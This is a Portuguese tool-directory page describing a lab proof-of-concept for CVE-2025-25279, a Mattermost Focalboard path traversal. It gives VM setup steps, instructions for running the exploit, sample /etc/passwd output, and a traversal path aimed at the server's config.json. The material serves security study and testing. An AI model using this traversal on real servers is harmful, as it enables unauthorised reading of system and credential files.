Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-25279-Mattermost-Path-Traversal — Prova de conceito de exploração para CVE-2025-25279, uma travessia de caminho no Mattermost Focalboard que permite leitura arbitrária de arquivos autenticada e exfiltração de arquivos sensíveis. | Kitploit
Ferramentas/GitHubGitHub/abokormahammadmousse/cve-2025-25279-mattermost-path-traversal
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubabokormahammadmousse/cve-2025-25279-mattermost-path-traversal

CVE-2025-25279-Mattermost-Path-Traversal

Prova de conceito de exploração para CVE-2025-25279, uma travessia de caminho no Mattermost Focalboard que permite leitura arbitrária de arquivos autenticada e exfiltração de arquivos sensíveis.

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔥 CVE-2025-25279 — Mattermost 10.4.1

📤 Path Traversal no Focalboard permitindo a exfiltração de arquivos

🌟 Apresentação

Esta prova de conceito demonstra a exploração da vulnerabilidade CVE-2025-25279 que afeta o Mattermost 10.4.1.
Uma falha no Focalboard (o módulo de gerenciamento de quadros) permite uma leitura arbitrária de arquivos através de um path traversal nos anexos.

O exploit permite exfiltrar:

  • /etc/passwd
  • /etc/group
  • ou arquivos sensíveis do Mattermost, por exemplo:
    opt/mattermost/config/config.json

O ataque funciona apenas com uma conta de usuário autenticada nos cenários vulneráveis.


🗂️ Organização dos diretórios

  • 📁 target : diretório de criação da box alvo
  • 📁 live : diretório de criação de VM(s) alvo(s) e de demonstração do exploit
  • 📁 src : eventual código fonte auxiliar
  • 📁 refs : diretório contendo os artigos e a bibliografia
  • 📁 docs : documentos associados produzidos durante o projeto, incluindo as gravações de vídeo

🔧 Pré-requisitos

  • Vagrant
  • VirtualBox
  • Conjunto de arquivos do projeto (target + live)
  • Uma conta Mattermost (PAT = Personal Access Token)
  • Linux/Mac/Windows com Bash

📦 Download do Mattermost

O diretório target/ não está incluído (muito volumoso para GitHub).

Baixar manualmente: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz

Em seguida, coloque o arquivo em: target


Antes de implantar a VM

Primeiro vá para o diretório target e execute:

root@kitploit:~
cd target
make mattermost.box

Certifique-se de ter a box mattermost-poc, caso contrário a VM não funcionará:

root@kitploit:~
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box

1. Implantação da máquina vulnerável

Iniciar a VM

root@kitploit:~
cd live/vm1
vagrant up

Conectar-se à VM

root@kitploit:~
 vagrant ssh

criar um usuário na interface web:

abrir: http://localhost:8065

criar um token na UI (interface de usuário):

Perfil --> Security --> Personal Access Tokens

2. Instalação do exploit

A partir da máquina host:

root@kitploit:~
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip

chmod +x exploit.sh

3. Executar o exploit

root@kitploit:~
./exploit.sh

Será solicitado:

root@kitploit:~
PAT (Personal Access Token) :

👉 Insira um PAT válido de um usuário Mattermost.

📸 Exemplo de saída (exfiltração de /etc/passwd)

root@kitploit:~
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh

Arquivo alvo: config.json

Para mirar um arquivo sensível do Mattermost:

Modifique no início do script exploit.sh:

root@kitploit:~
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
O exploit exibirá então o conteúdo do arquivo config.json.

✒️ Autores

🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril

🎬 Demonstração em vídeo

👉 Uma demonstração completa em vídeo encontra-se em: live/Démonstration/video-poc-cve-2025-25279.mp4

🧩 Notas

Este PoC é estritamente destinado a ambientes de aprendizado. Nunca use fora de contexto educacional ou sem autorização.

Baixar ferramenta